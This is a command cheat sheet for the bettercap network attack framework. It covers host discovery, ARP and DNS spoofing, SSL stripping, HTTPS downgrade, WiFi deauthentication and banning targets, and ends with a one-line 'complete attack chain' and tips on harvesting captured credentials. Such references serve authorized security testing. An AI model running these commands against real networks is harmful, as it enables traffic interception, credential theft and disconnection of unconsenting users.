bettercap is a powerful network attack and monitoring framework. It can perform ARP spoofing, DNS spoofing, credential harvesting, and various network attacks.
Starting bettercap
- bettercap - Start interactive session
- bettercap -iface <interface> - Specify network interface
- bettercap -eval "cmd1; cmd2" - Execute commands
- bettercap -caplet <file> - Load caplet file
- sudo bettercap - Start with root (required for most features)
Core Commands
- help - Show help
- help <module> - Help for specific module
- active - Show active modules
- info - Show session info
- version - Show version
- exit / quit - Exit bettercap
Network Discovery
- net.probe on - Start network discovery
- net.probe off - Stop network discovery
- net.show - Show discovered hosts
- net.recon on - Enable network recon
- net.recon off - Disable network recon
- set net.recon.sort true - Sort hosts by response time
ARP Spoofing
- arp.spoof on - Start ARP spoofing
- arp.spoof off - Stop ARP spoofing
- arp.spoof.internal true - Spoof internal traffic
- arp.spoof.targets <ip> - Set target IP
- arp.spoof.targets <ip1,ip2> - Set multiple targets
- arp.spoof.fullduplex true - Full duplex mode
- arp.ban on - Ban targets from network
- arp.ban off - Stop banning targets
DNS Spoofing
- dns.spoof on - Start DNS spoofing
- dns.spoof off - Stop DNS spoofing
- dns.spoof.hosts <domain> - Spoof specific domain
- dns.spoof.hosts "example.com->192.168.1.100" - Redirect domain to IP
- set dns.spoof.all true - Spoof all DNS queries
- set dns.spoof.domains "example.com,test.com" - Spoof multiple domains
HTTP/HTTPS Proxy
- http.proxy on - Start HTTP proxy
- http.proxy off - Stop HTTP proxy
- set http.proxy.port 8080 - Set proxy port (default 8080)
- set http.proxy.sslstrip true - Enable SSL strip
- https.proxy on - Start HTTPS proxy
- https.proxy off - Stop HTTPS proxy
- set https.proxy.port 8083 - Set HTTPS proxy port
- set https.proxy.sslpem /path/to/cert.pem - Set SSL certificate
Credential Harvesting
- http.server on - Start HTTP server
- set http.server.path /path/to/files - Set server path
- set http.server.port 80 - Set server port
- hstshijack/hstshijack - HTTPS downgrade attack
WiFi Operations
- wifi.recon on - Start WiFi reconnaissance
- wifi.recon off - Stop WiFi reconnaissance
- wifi.show - Show discovered access points
- wifi.deauth <ap> - Deauthenticate clients
- wifi.assoc <ap> - Associate with access point
Event Logging
- events.stream on - Start event stream
- events.stream off - Stop event stream
- events.show - Show captured events
- events.clear - Clear events
- events.ignore <filter> - Ignore events matching filter
- events.feed <file> - Feed events to file
Caplets
- caplets.update - Update caplets
- caplets.show - List available caplets
- caplet <name> - Load caplet
Common Examples
Basic ARP Spoofing
bettercap -iface eth0
# In bettercap prompt:
net.probe on
arp.spoof on
set arp.spoof.targets 192.168.1.100DNS Spoofing
bettercap -iface eth0
# In bettercap prompt:
dns.spoof on
set dns.spoof.hosts "example.com->192.168.1.100"HTTP Proxy
bettercap -iface eth0
# In bettercap prompt:
http.proxy on
set http.proxy.sslstrip trueWiFi Recon
bettercap -iface wlan0
# In bettercap prompt:
wifi.recon on
wifi.showComplete Attack Chain
bettercap -iface eth0 -eval "net.probe on; arp.spoof on; dns.spoof on; http.proxy on; https.proxy on"Ban Target from Network
bettercap -iface eth0
# In bettercap prompt:
arp.ban on
set arp.ban.targets 192.168.1.100Load Caplet
bettercap -caplet caplets/http-ui.capTips
- Always run bettercap with sudo for full functionality
- Use net.probe to discover hosts before attacks
- Combine ARP spoofing with HTTP proxy for traffic interception
- Use DNS spoofing to redirect domains to attacker-controlled servers
- Enable SSL strip to intercept HTTPS traffic (HTTP downgrade)
- Use caplets for common attack scenarios
- Check events stream for captured credentials and data
- Use arp.ban to effectively disconnect targets from network
- Always test on authorized networks only
- WiFi operations require monitor mode interface